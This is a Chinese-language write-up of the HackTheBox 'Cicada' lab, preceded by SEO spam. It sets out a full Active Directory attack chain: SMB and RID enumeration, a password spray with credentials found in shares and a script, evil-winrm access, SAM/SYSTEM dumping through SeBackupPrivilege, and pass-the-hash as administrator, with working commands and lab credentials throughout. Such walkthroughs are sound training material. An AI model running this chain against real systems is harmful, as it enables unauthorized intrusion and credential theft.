国内做五金加工的订单网站,seo 网站推广,个人制作网站,浏览有关小城镇建设的网站6Cicada 靶机笔记
概述
HTB 的靶机 Cicada 靶机
靶机地址#xff1a;https://app.hackthebox.com/machines/Cicada
很有意思且简单的 windows 靶机#xff0c;这台靶机多次利用了信息枚举#xff0c;利用不同的信息一步一步获得 root 权限
一、nmap 扫描
1#xff09;…Cicada 靶机笔记
概述
HTB 的靶机 Cicada 靶机
靶机地址https://app.hackthebox.com/machines/Cicada
很有意思且简单的 windows 靶机这台靶机多次利用了信息枚举利用不同的信息一步一步获得 root 权限
一、nmap 扫描
1端口扫描
-sT tcp 全连接扫描 --min-rate 以最低速率 10000 扫描 -p- 扫描全端口
nmap -sT -p- --min-rate 10000 -o ports 10.10.11.35Nmap scan report for 10.10.11.35
Host is up (0.39s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
54435/tcp open unknown处理端口
ports$(grep open ports | awk -F/ {print $1} | paste -sd ,)2详情探测
-sT tcp 全连接扫描 -sV 探测端口服务版本 -sC 使用默认脚本扫描
nmap -sT -sV -sC -O -p53,88,135,139,389,445,464,593,636,3268,3269,5985,5443
5 -o details 10.10.11.35Nmap scan report for 10.10.11.35
Host is up (0.35s latency).PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-29 15:06:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonNameCICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::unsupported, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonNameCICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::unsupported, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonNameCICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::unsupported, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonNameCICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::unsupported, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
54435/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-09-29T15:08:00
|_ start_date: N/A3) 漏洞脚本扫描
nmap --scriptvuln -p53,88,135,139,389,445,464,593,636,3268,3269,5985,54435 -o vuln 10.10.11.35Nmap scan report for 10.10.11.35
Host is up (0.35s latency).PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp open wsman
54435/tcp filtered unknownHost script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false二、smb 枚举
1smbclient
看到目标开放了 445 端口的 smb 服务先对它进行匿名访问
smbclient -L 10.10.11.35Password for [WORKGROUP\kali]:Sharename Type Comment--------- ---- -------ADMIN$ Disk Remote AdminC$ Disk Default shareDEV Disk HR Disk IPC$ IPC Remote IPCNETLOGON Disk Logon server share SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available空密码看到有共享信息暴露给我们。
只有 HR 磁盘有访问权限进去看看有没有感兴趣的信息
smbclient \\10.10.11.35\HRPassword for [WORKGROUP\kali]:
Try help to get a list of possible commands.smb: \ dir. D 0 Thu Mar 14 20:29:09 2024.. D 0 Thu Mar 14 20:21:29 2024Notice from HR.txt A 1266 Thu Aug 29 01:31:48 20244168447 blocks of size 4096. 424297 blocks availablesmb: \ get Notice from HR.txt
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \ 看到一个名为 Notice from HR.txt 的文件
查看内容
cat Notice\ from\ HR.txt Dear new hire!Welcome to Cicada Corp! Were thrilled to have you join our team. As part of our security protocols, its essential that you change your default password to something unique and secure.Your default password is: Cicada$M6Corpb*Lp#nZp!8To change your password:1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as Change Password.
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.If you encounter any issues or need assistance with changing your password, dont hesitate to reach out to our support team at supportcicada.htb.Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!Best regards,
Cicada Corp看上去是一封邮件里面我们后的了一组密码凭证Cicada$M6Corpb*Lp#nZp!8
不知道用户名我们用crackmapexec枚举机器的用户名
2crackmapexec
a枚举用户名
crackmapexec smb 10.10.11.35 -u dsad -p --rid-bruteSMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [] cicada.htb\dsad:
SMB 10.10.11.35 445 CICADA-DC [] Brute forcing RIDs
SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)从结果中过滤出SidTypeUser的信息来就是机器的用户
Administrator
Guest
krbtgt
Domain
Protected
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscarsb爆破凭证
把用户放到user文件中把密码放到pass文件中
crackmapexec smb 10.10.11.35 -u user -p pass --continue-on-success看到正确的smb凭证信息michael.wrightson:Cicada$M6Corpb*Lp#nZp!8
看看它的共享权限
crackmapexec smb 10.10.11.35 -u michael.wrightson -p pass --shares可以看到一个新的共享文件DEV但这个账户并没有READ权限
同时这个账户也不支持winrm远程管理 c进一步枚举
利用已知的账户枚举其他账户信息
crackmapexec smb 10.10.11.35 -u michael.wrightson -p pass --users发现了另一组凭证信息david.orelious:aRt$Lp#7t*VQ!3
看以他的smb权限
crackmapexec smb 10.10.11.35 -u david.orelious -p aRt$Lp#7t*VQ!3 --shares看到这个用户对DEV文件有读权限
用smbclient把它下载下来
smbclient \\10.10.11.35\DEV -U david.orelious Password for [WORKGROUP\david.orelious]:
Try help to get a list of possible commands.
smb: \ dir. D 0 Thu Mar 14 20:31:39 2024.. D 0 Thu Mar 14 20:21:29 2024Backup_script.ps1 A 601 Thu Aug 29 01:28:22 20244168447 blocks of size 4096. 423385 blocks available
smb: \ get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \ 看到Backup_script.ps1下载下来
cat Backup_script.ps1$username emily.oscars
$password ConvertTo-SecureString Q!3Lp#M6b*7t*Vt -AsPlainText -Force
$credentials New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp Get-Date -Format yyyyMMdd_HHmmss
$backupFileName smb_backup_$dateStamp.zip
$backupFilePath Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host Backup completed successfully. Backup file saved to: $backupFilePath有发现了一组凭证emily.oscars:Q!3Lp#M6b*7t*Vt
验证winrm权限
crackmapexec winrm 10.10.11.35 -u emily.oscars -p Q!3Lp#M6b*7t*Vt看到是Pwn3d! 的状态说明可以登录
三获得立足点
1evil-winrm
evil-winrm -i 10.10.11.35 -u emily.oscars -p Q!3Lp#M6b*7t*Vt拿到user flag
四提权
看看当前用户权限
whoami /privPRIVILEGES INFORMATION
----------------------Privilege Name Description StateSeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled看到当前用户有SeBackupPrivilege和SeRestorePrivilege权限我们可以把samsystem转储出来破解administrator的hash值接着利用PTH进行哈希传递攻击从而获取administrator权限
在c盘下创建一个temp目录
执行
reg save hklm\sam c:\temp\san
reg save hklm\system c:\temp\system看到转出出来的sam和system
downlaod sam
download system将文件下载到本地 破解sam
impacket-secretsdump -sam sam -system system local看到administrator的ntlmhash值2b87e7c93a3e8a0ea4a581937016f341
进行hash传递也就是PTH攻击
evil-winrm -i 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341成功拿到root权限
总结
通过nmap扫描发现目标开放了445 smb服务对smb进行信息的枚举发现了一个用户密码进入获得了一组可以用来进行winrm远程管理的凭证登陆进去发现用具有SeBackupPrivilege的权限利用该权限转储hash值进行PTH攻击获得了管理员权限
